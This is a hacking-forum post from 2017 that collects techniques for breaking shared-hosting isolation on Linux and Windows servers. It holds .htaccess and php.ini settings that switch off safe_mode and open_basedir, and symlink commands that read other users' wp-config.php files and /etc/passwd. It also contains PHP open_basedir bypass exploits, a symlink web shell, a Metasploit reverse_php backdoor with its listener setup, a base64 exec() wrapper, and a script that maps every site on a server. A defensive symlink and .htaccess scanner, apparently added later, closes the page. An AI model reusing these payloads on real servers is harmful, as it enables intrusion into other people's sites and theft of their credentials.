KingSkrupellos

All Linux and Windows Server Symlink and .htaccess Bypass Techniques

Sep 19th, 2017
  1. Topic Title => Linux and Windows Server ByPass Symlink .htaccess .php.ini OVH Hosting LiteSpeed Server Restriction Bypass Vulnerability Evasion Techniques [ 19.09.2017 ]
  2.  
  3. Original Topic Link => https://www.cyberizm.org/cyberizm-tum-linux-win-server-bypass-symlink-htaccess-teknikleri.html
  4.  
  5. Prepared by => KingSkrupellos - Cyberizm Digital Security Team
  6.  
  7. Article You Should Read Before Reading All of This =>
  8.  
  9. Disabling Safe Mode on Servers: Detailed Explanation
  10.  
  11. [hide][code]https://www.cyberizm.org/cyberizm-sunucularda-guvenlik-modunu-devre-disi-birakma-detayli-anlatim.html[/code][/hide]
  12.  
  13. SOME Video Walkthroughs on the Topic =>
  14.  
  15. [video=youtube]https://www.youtube.com/watch?v=OU7gakFAEf0[/video]
  16.  
  17. [video=youtube]https://www.youtube.com/watch?v=dQ1y1GSiobA[/video]
  18.  
  19. [video=youtube]https://www.youtube.com/watch?v=5dkb8aHknYg[/video]
  20.  
  21. [video=youtube]https://www.youtube.com/watch?v=y2V1VK7w77c[/video]
  22.  
  23. [video=youtube]https://www.youtube.com/watch?v=CNMRkOY225I[/video]
  24.  
  25. [video=youtube]https://www.youtube.com/watch?v=nNVk5AxKsIE[/video]
  26.  
  27. [video=youtube]https://www.youtube.com/watch?v=drcru-MI2sI[/video]
  28.  
  29. [video=youtube]https://www.youtube.com/watch?v=-DIasGdWimM[/video]
  30.  
  31. [video=youtube]https://www.youtube.com/watch?v=0POx2Gsrrxs[/video]
  32.  
  33. [video=youtube]https://www.youtube.com/watch?v=1kggQCF79DE[/video]
  34.  
  35. Contents =>
  36.  
  37. 1) - [ Bypass Directory ]-
  38.  
  39. 2) Bypass Symlink with .htaccess
  40.  
  41. 3) LiteSpeed Bypass [SymLink]
  42.  
  43. 4) Litespeed Symlink 403 Forbidden Bypass
  44.  
  45. 5) - [ Include symlink ]-
  46.  
  47. 6) - [ Bypass Litespeed ] -
  48.  
  49. 7) - [ ByPass OVH Hosting ]-
  50.  
  51. 8) - [ Bypass Symlink 403 forbidden ] -
  52.  
  53. 9) Bypass symlink via .htaccess 2016
  54.  
  55. 10 ) ByPass Passwd in LiteSpeed: General Logic
  56.  
  57. 11 ) Bypass Symlink (Priv8) Code
  58.  
  59. 12 ) PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
  60.  
  61. 13 ) Server Bypass OVH & BlueHost Symlink Code 2014
  62.  
  63. 14 ) Symlink Bypass 404
  64.  
  65. 15) Internal Server Error Bypass: The Error and Its Fix Code
  66.  
  67. 16) Metasploit Bypass Backconnect & Get Domainowners
  68.  
  69. 17 ) Server Bypass read and edit file with python script Work On (Linux,Win)
  70.  
  71. __________________________________________
  72.  
  73. - [ Bypass Directory ]-
  74.  
  75. [code]<Directory "/home/user/public_html">
  76. Options -ExecCGI
  77. AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
  78. </Directory>[/code]
  79.  
  80. Bypass Symlink with .htaccess
  81.  
  82. [code]
  83. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  84. AddHandler txt .php
  85. AddHandler cgi-script .pl
  86. AddHandler cgi-script .pl
  87. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  88. Options Indexes FollowSymLinks
  89. AddType txt .php
  90. AddType text/html .shtml
  91. Options All
  92. Options All[/code]
  93.  
  94. LiteSpeed Bypass [SymLink]
  95.  
  96. [code]
  97. python shell , CGI PERL Shell
  98. and .htaccess
  99. the htaccess code is
  100. Options Indexes FollowSymLinks
  101. DirectoryIndex ssssss.htm
  102. AddType txt .php
  103. AddHandler txt .php
  104. <IfModule mod_autoindex.c>
  105. IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
  106. </ifModule>
  107. <IfModule mod_security.c>
  108. SecFilterEngine Off
  109. SecFilterScanPOST Off
  110. </IfModule>
  111. Options +FollowSymLinks
  112. DirectoryIndex Sux.html
  113. Options +Indexes
  114. AddType text/plain .php
  115. AddHandler server-parsed .php
  116. AddType text/plain .html
  117. ===============
  118. what we should do ?
  119. just open the cgi bypass shell
  120. and do sym
  121. ln -s /home/user/public_html/wp-config.php 1.txt
  122. then
  123. cat 1.txt[/code]
  124.  
  125. Litespeed Symlink 403 Forbidden Bypass
  126.  
  127. [code]
  128. Options all
  129. DirectoryIndex Sux.html
  130. AddType text/plain .php
  131. AddHandler server-parsed .php
  132. AddType text/plain .html
  133. AddHandler txt .html
  134. Require None
  135. Satisfy Any
  136. DirectoryIndex new
  137. DirectoryIndex config.ini[/code]
  138.  
  139.  
  140. - [ Include symlink ]-
  141.  
  142. [code]
  143. Options Indexes FollowSymLinks
  144. DirectoryIndex ssssss.htm
  145. AddType txt .php
  146. AddHandler txt .php[/code]
  147.  
  148. - [ Bypass Litespeed ] -
  149.  
  150. [code]
  151. wew.shtml
  152. do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
  153. .htaccess
  154. Options +FollowSymLinks
  155. DirectoryIndex chesss.html
  156. RemoveHandler .php
  157. AddType application/octet-stream .php[/code]
  158.  
  159. - [ Bypass OVH ]-
  160.  
  161. [code]
  162. .htaccess
  163. Options +FollowSymLinks
  164. DirectoryIndex Index.html
  165. Options +Indexes
  166. AddType text/plain .php
  167. AddHandler server-parsed .php
  168. AddType root .root
  169. AddHandler cgi-script .root
  170. AddHandler cgi-script .root
  171. php.ini
  172. safe_mode = Off
  173. disable_functions =
  174. safe_mode_gid = Off
  175. open_basedir = Off
  176. register_globals = on
  177. exec = On
  178. shell_exec = On
  179. ln -s / CoderSec[/code]
  180.  
  181. - [ Bypass Symlink 403 forbidden ] -
  182.  
  183. [code]
  184. .htaccess
  185. Options all
  186. DirectoryIndex Sux.html
  187. AddType text/plain .php
  188. AddHandler server-parsed .php
  189. AddType text/plain .html
  190. AddHandler txt .html
  191. Require None
  192. Satisfy Any[/code]
  193.  
  194.  
  195. Bypass symlink via .htaccess 2016
  196.  
  197. [code]
  198. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  199. AddHandler txt .php
  200. AddHandler cgi-script .cgi
  201. AddHandler cgi-script .pl
  202. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  203. Options Indexes FollowSymLinks
  204. AddType txt .php
  205. AddType text/html .shtml
  206. Options All
  207. Options All[/code]
  208.  
  209.  
  210. ByPass Passwd in LiteSpeed: General Logic
  211.  
  212. [code]
  213. A good way to bypass forbidden error when reading passwd file
  214. The general approach:
  215.  
  216.  
  217. ln -s / etc / passwd passwd.txt
  218.  
  219. When you open the passwd file, a forbidden error is encountered.
  220. for bypass=>
  221.  
  222. To bypass it, one of the following two commands is used:
  223.  
  224. ln -s /etc/passwd README
  225. ln -s /etc/passwd HEADER
  226. The second command is run in a directory, and when we go back to that directory the passwd file will be shown to us.
  227. SPT to b0x
  228.  
  229. Bypass Symlink (Priv8)
  230. How you can bypass Symlink in linux webserver ?
  231.  
  232. 1/ Create a folder
  233.  
  234. 2/ Upload inside
  235.  
  236. ".htaccess"
  237.  
  238. CODE:
  239.  
  240. Options all
  241. DirectoryIndex Sux.html
  242. AddType text/plain .php
  243. AddHandler server-parsed .php
  244. AddType text/plain .html
  245. AddHandler txt .html
  246. Require None
  247. Satisfy Any
  248.  
  249. 3/ Bypass manually
  250.  
  251. ln -s /home/user/public_html/t0ph4cking.txt
  252.  
  253. Bypass Symlink 403 Forbidden with .htaccess
  254.  
  255. Options all
  256. DirectoryIndex Sux.html
  257. AddType text/plain .php
  258. AddHandler server-parsed .php
  259. AddType text/plain .html
  260. AddHandler txt .html
  261. Require None
  262. Satisfy Any[/code]
  263.  
  264. Simple Bypass Internal Server Error Symlink 2016
  265.  
  266. [code]
  267. Options Indexes FollowSymLinks
  268. DirectoryIndex linuxsec.htm
  269. AddType txt .php
  270. AddHandler txt .php[/code]
  271.  
  272. PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
  273.  
  274. [code]
  275. <?php
  276. /*
  277. PHP 5.2.11/5.3.0 symlink() open_basedir bypass
  278. by KingSkrupellos - Cyberizm Digital Security Team
  279.  
  280. CHUJWAMWMUZG
  281. */
  282.  
  283. $fakedir="cx";
  284. $fakedep=16;
  285.  
  286. $num=0; // offset of symlink.$num
  287.  
  288. if(!empty($_GET['file'])) $file=$_GET['file'];
  289. else if(!empty($_POST['file'])) $file=$_POST['file'];
  290. else $file="";
  291.  
  292. echo '<PRE><img
  293. src="http://www.cyberizm.org/"><P>This is exploit
  294. from <a
  295. href="http://securityreason.com/" title="Cyberizm PHP">Cyberizm
  296. Lab - SecurityReason</a> labs.
  297. Author : KingSkrupellos
  298. <p>Script for legal use only.
  299. <p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
  300. <p>More: <a href="http://cyberizm.org/">Cyberizm</a>
  301. <p><form name="form"
  302. action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
  303. "]).'" method="post"><input type="text" name="file" size="50"
  304. value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
  305. value="Create Symlink"></form>';
  306.  
  307. if(empty($file))
  308. exit;
  309.  
  310. if(!is_writable("."))
  311. die("not writable directory");
  312.  
  313. $level=0;
  314.  
  315. for($as=0;$as<$fakedep;$as++){
  316. if(!file_exists($fakedir))
  317. mkdir($fakedir);
  318. chdir($fakedir);
  319. }
  320.  
  321. while(1<$as--) chdir("..");
  322.  
  323. $hardstyle = explode("/", $file);
  324.  
  325. for($a=0;$a<count($hardstyle);$a++){
  326. if(!empty($hardstyle[$a])){
  327. if(!file_exists($hardstyle[$a]))
  328. mkdir($hardstyle[$a]);
  329. chdir($hardstyle[$a]);
  330. $as++;
  331. }
  332. }
  333. $as++;
  334. while($as--)
  335. chdir("..");
  336.  
  337. @rmdir("fakesymlink");
  338. @unlink("fakesymlink");
  339.  
  340. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  341.  
  342. // this loop will skip allready created symlinks.
  343. while(1)
  344. if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
  345. "symlink".$num))) break;
  346. else $num++;
  347.  
  348. @unlink("fakesymlink");
  349. mkdir("fakesymlink");
  350.  
  351. die('<FONT COLOR="RED">check symlink <a
  352. href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
  353.  
  354. ?>
  355.  
  356. PHP Symbolic Link Open_Basedir Bypass Vulnerability
  357.  
  358. script1.php
  359. <?
  360. symlink("a/a/a/a/a/a/", "dummy");
  361. symlink("dummy/../../../../../../etc/passwd", "xxx");
  362. unlink("dummy");
  363. while (1) {
  364. symlink(".", "dummy");
  365. unlink("dummy");
  366. }
  367. ?>
  368.  
  369. script2.php
  370. <?
  371. while (1) {
  372. print @file_get_contents("xxx");
  373. }
  374. ?>[/code]
  375.  
  376. Symlink Bypass 404
  377.  
  378. [code]
  379. <? /*KingSkrupellos Symlink Bypass 404*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<title>Cyberizm SYM404</title><body bgcolor=silver><center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
  380. rmdir("sl");mkdir("sl", 0777);$fl = $_POST['fl'];system("ln -s ".$fl." sl/x.txt");symlink($fl,"sl/x.txt");$anu = fopen("sl/.htaccess", "w");
  381. fwrite($anu,"ReadmeName x.txt");
  382. echo'<a href=sl/x.txt>CHECK</a>';
  383. }[/code]
  384.  
  385.  
  386. Server Bypass OVH & BlueHost Symlink Code 2014
  387.  
  388. [code]
  389. ".htaccess":
  390.  
  391. #Bypass By Cyberizm.Org
  392. <DIRECTORY /..../user/..../>
  393. OPTIONS Indexes ExecCGI FollowSymLinks
  394. AllowOverride All
  395. </DIRECTORY>
  396. AddType txt .php
  397. AddHandler txt .php
  398.  
  399.  
  400. "php.ini":
  401.  
  402. #Bypass By Cyberizm.Org
  403. safe_mode = OFF
  404. disable_functions = NONE
  405. safe_mode_gid = OFF
  406. open_basedir = OFF
  407. register_globals = ON
  408. exec = ON
  409. shell_exec = ON[/code]
  410.  
  411. Internal Server Error Bypass: The Error and Its Fix Code
  412.  
  413. [code]
  414. Sometimes, when working with a CGI telnet shell on a server, you get an annoying error called Internal Server Error. There are many ways to solve it, but the most reliable one is to log in to cPanel, go to the MIME Types section, and in the first field enter
  415.  
  416. application/x-httpd-cgi
  417.  
  418. and then in the second field enter the extension of your CGI shell. For example, if your CGI shell is named ali.veli, enter veli in the second field and confirm, then go to the browser and refresh the address where the CGI shell is located. Before refreshing, do not forget to chmod 755 the CGI shell named ali.veli.
  419.  
  420. First, before uploading the CGI to the server, open the Perl code and, at the very top,
  421.  
  422. write #!/usr/bin/perl -I/usr/local/bandmain and upload it to the server.
  423.  
  424. If you still get an error on the server, I suggest trying the Web Shell CGI
  425.  
  426. http://archive.is/UT8xf Here it is
  427.  
  428. .htaccess code :
  429. Options +FollowSymLinks
  430. DirectoryIndex seees.html
  431. Options +Indexes
  432. Options +ExecCGI
  433. AddHandler cgi-script cgi pl wasRewriteEngine on
  434. RewriteRule (.*)\.was$ $1.was[/code]
  435.  
  436. Metasploit Bypass Backconnect & Get Domainowners
  437.  
  438. [code]
  439. ////////////////////SET UP BACKDOOR////////////////////
  440. use payload/php/reverse_php
  441. set LHOST [You Wan Ip] set LPORT 22
  442. set ENCODER php/base64
  443. generate -t raw
  444.  
  445. ////////////////SET UP LISTENING/////////////////
  446. use exploit/multi/handler
  447. set LHOST [You Lan IP] set LPORT 22
  448. set payload php/reverse_php
  449. exploit
  450.  
  451. /////////////////// RUN BACKDOOR////////////////
  452. php /home/yfnvpnvb/domains/quangcaonewstar.com/public_html/test.php
  453. //////////////////CAT /ETC/PASSWD//////////////
  454. cat /etc/passwd > passwd.txt
  455. ///////////////////CAT USER-DOMAIN/////////////
  456. cat /etc/virtual/domainowners > domain.txt[/code]
  457.  
  458. ____________________
  459.  
  460. [code]
  461. #!/usr/bin/python
  462. #-------------------------------------------------------------------------------
  463. # Author: KingSkrupellos
  464. # WebSite Cyberizm.Org
  465. #-------------------------------------------------------------------------------
  466. import base64;
  467. exec(base64.b64decode('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'))[/code]
  468.  
  469. Symlink 404 Not Found Script
  470.  
  471. [code]
  472. #!/usr/bin/env python
  473. #Symlink Script by KingSkrupellos
  474. #Creates Symlinks and makes a neat PHP index of sites in the dir "kidsymx"
  475. #Version 1.1
  476. #Minor fixes
  477. #
  478. #contact me @ Cyberizm Digital Security Team
  479. #Cyberizm
  480. import os,sys,re
  481. if not os.path.exists('kidsymx'):
  482. os.makedirs('kidsymx')
  483. os.chdir('kidsymx')
  484. hta='Options Indexes FollowSymLinks\nDirectoryIndex kSym.php\nAddType txt .php\nAddHandler txt .php\n'
  485. x=open('.htaccess','w')
  486. x.write(hta)
  487. x.close()
  488. print '[+] htaccess created'
  489. h="<html><head><title>kidSym</title><style>table,tr,td{padding: 7px 10px 7px 10px ; border: 1px solid black;} .menf{font-color:lime; font-size:11px; font-weight:bold;}</style></head><body bgcolor=#98FF98><center>
  490. <h1>
  491. kidSym</h1>
  492. <p class=menf>
  493. KingSkrupellos
  494. greetz:Cyberizm Digital Security Team</p>
  495. <table >"
  496. os.system("ln -s / kid.txt")
  497. if os.path.exists('kid.txt'):
  498. print "[+] Symlink Created"
  499. else:
  500. print "[-] Unable to Create Symlink"
  501. usrs=[]
  502. sitesx=[]
  503. z=open("/etc/passwd","r")
  504. z=z.read()
  505. z=re.findall('/home\w*?/\w+',z)
  506. for usr in z:
  507. usrs.append(usr)
  508.  
  509. sites=os.listdir("/var/named/")
  510. for site in sites:
  511. site=site.replace(".db","")
  512. sitesx.append(site)
  513.  
  514. #php making
  515. path=os.getcwd()
  516. if "/public_html/" in path:
  517. path="/public_html/"
  518. else:
  519. path="/html/"
  520. counter=1
  521. indx=open("kSym.php","w")
  522. indx.write(h)
  523. for userx in usrs:
  524. for sitex in sitesx:
  525. u=userx.split("/",2)[2][0:5]
  526. s=sitex[0:5]
  527. if u==s:
  528. indx.write("
  529. <tr><td style=font-family:calibri;font-weight:bold;color:grey;>%s</td><td style=font-family:calibri;font-weight:bold;color:red;>%s</td><td style=font-family:calibri;font-weight:bold;><a href="kid.txt%s%s" target="_blank">%s</a></td>"%(counter,userx.split("/",3)[2],userx,path,sitex))
  530. counter=counter+1
  531. print "[+] Site index Complete"
  532.  
  533. print "[*] %s Sites found" %str(counter)
  534.  
  535. print "[+] Happy Hacking ./KingSkrupellos Cyberizm Digital Security Team"[/code]
  536.  
  537. That's all. Happy Hacking. Mr. KingSkrupellos Cyberizm Digital Security Team
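
A defender-side check for the pattern the snippets above rely on, added here as an example and not part of the original paste: it walks one hosting account's document root and flags symlinks that resolve outside it or to a file owned by another user, plus `.htaccess` directives of the kinds listed above. The function names and the one-docroot-per-account layout are assumptions.

```python
import os
import re

# Directive patterns drawn from the .htaccess snippets on this page.
_PATTERNS = [
    (r"Options\b.*?(?<![-\w])(All|FollowSymLinks)\b", "Options enables FollowSymLinks"),
    (r"Add(Type|Handler)\s+(txt|text/plain|server-parsed|application/octet-stream)\s.*\.php\b",
     ".php remapped away from the PHP handler"),
    (r"RemoveHandler\s.*\.php\b", "PHP handler removed"),
    (r"(ReadmeName|HeaderName)\b", "autoindex README/HEADER include"),
]
RULES = [(re.compile(r"^\s*" + rx, re.I), why) for rx, why in _PATTERNS]


def scan_htaccess(path):
    """Return (line_no, reason) for each risky directive in one .htaccess."""
    with open(path, errors="replace") as fh:
        return [(no, why) for no, line in enumerate(fh, 1)
                for rx, why in RULES if rx.search(line)]


def scan_symlink(path, docroot):
    """Return the reasons a symlink is unsafe; empty list if acceptable."""
    reasons = []
    target = os.path.realpath(path)
    root = os.path.realpath(docroot)
    if os.path.commonpath([root, target]) != root:
        reasons.append("target outside docroot: " + target)
    try:
        # Same ownership comparison that SymLinksIfOwnerMatch is named for.
        if os.lstat(path).st_uid != os.stat(path).st_uid:
            reasons.append("link and target owners differ")
    except OSError:
        reasons.append("dangling link")
    return reasons


def audit(docroot):
    """Walk one account's docroot without following links; return {path: [findings]}."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(docroot, followlinks=False):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            found = []
            if os.path.islink(full):
                found += scan_symlink(full, docroot)
            elif name == ".htaccess":
                found += [f"line {n}: {r}" for n, r in scan_htaccess(full)]
            if found:
                report[full] = found
    return report
```

Findings from the directive check matter most where the server configuration grants `AllowOverride` for `Options`, `FileInfo` and `Indexes`, since those are the override classes that let a per-directory `.htaccess` set `Options`, `AddType`/`AddHandler` and `ReadmeName`/`HeaderName`.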